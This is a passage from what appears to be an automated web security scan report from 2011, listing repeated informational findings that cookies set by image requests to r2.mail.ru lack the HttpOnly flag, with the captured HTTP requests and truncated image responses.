Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531249.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531249.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 1807
Connection: keep-alive
Set-Cookie: p=vOoGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...

16.119. http://r2.mail.ru/b12531545.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531545.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531545.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 1374
Connection: keep-alive
Set-Cookie: p=NdYGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....,.,.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<..!..............................
...[SNIP]...

16.120. http://r2.mail.ru/b12531624.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531624.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531624.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1811
Connection: keep-alive
Set-Cookie: p=Z+kGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<..!..............................
...[SNIP]...

16.121. http://r2.mail.ru/b12532203.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12532203.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12532203.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2157
Connection: keep-alive
Set-Cookie: p=ueEGAEipQQAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...

16.122. http://r2.mail.ru/b12752186.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752186.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752186.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/jpeg
Content-Length: 1841
Connection: keep-alive
Set-Cookie: p=iBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 85
...C.........................    ....................!........."$".$.......C..............................................
...[SNIP]...

16.123. http://r2.mail.ru/b12752583.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752583.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752583.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 1772
Connection: keep-alive
Set-Cookie: p=NOkGAFnN4QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
....................................<.<..................................    
.....................}........!1A..Qa."q.2....#B...R..$3br.    
.....
...[SNIP]...

16.124. http://r2.mail.ru/b12752584.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752584.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752584.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5872
Connection: keep-alive
Set-Cookie: p=K/QGAEvncgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

16.125. http://r2.mail.ru/b12752585.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752585.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752585.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 5320
Connection: keep-alive
Set-Cookie: p=79sGAErbVQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

16.126. http://r2.mail.ru/b12752586.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12752586.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12752586.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 4402
Connection: keep-alive
Set-Cookie: p=z+8GAE/NaQAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................<.<..
...[SNIP]...

16.127. http://r2.mail.ru/b12855502.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12855502.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12855502.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 2692
Connection: keep-alive
Set-Cookie: p=8twGAErJFgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

16.128. http://r2.mail.ru/b12887675.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887675.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887675.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3685
Connection: keep-alive
Set-Cookie: p=QYwGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...

16.129. http://r2.mail.ru/b12887676.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887676.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887676.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:33 GMT
Content-Type: image/jpeg
Content-Length: 3621
Connection: keep-alive
Set-Cookie: p=L/YGAE2r7QAA; expires=Wed, 24-Apr-13 14:21:33 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:33 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...

16.130. http://r2.mail.ru/b12887677.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12887677.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12887677.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:35 GMT
Content-Type: image/jpeg
Content-Length: 3066
Connection: keep-alive
Set-Cookie: p=AtoGAEnndQAA; expires=Wed, 24-Apr-13 14:21:35 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:35 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................<.<..
...[SNIP]...

16.131. http://r2.mail.ru/b12961140.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961140.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961140.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2105
Connection: keep-alive
Set-Cookie: p=wfsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...

16.132. http://r2.mail.ru/b12961154.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961154.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961154.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 1321
Connection: keep-alive
Set-Cookie: p=XOcGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......D.Z.."..............................
...[SNIP]...

16.133. http://r2.mail.ru/b12961373.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12961373.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12961373.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:36 GMT
Content-Type: image/jpeg
Content-Length: 2341
Connection: keep-alive
Set-Cookie: p=0+oGAFLrEgAA; expires=Wed, 24-Apr-13 14:21:36 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:36 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................D.Z.."..............................
...[SNIP]...

16.134. http://r2.mail.ru/b12962356.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12962356.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12962356.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:29 GMT
Content-Type: image/jpeg
Content-Length: 2232
Connection: keep-alive
Set-Cookie: p=BPIGAGGvrgAA; expires=Wed, 24-Apr-13 14:21:29 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:29 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<.P.."..............................
...[SNIP]...

16.135. http://r2.mail.ru/b12963308.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12963308.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12963308.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
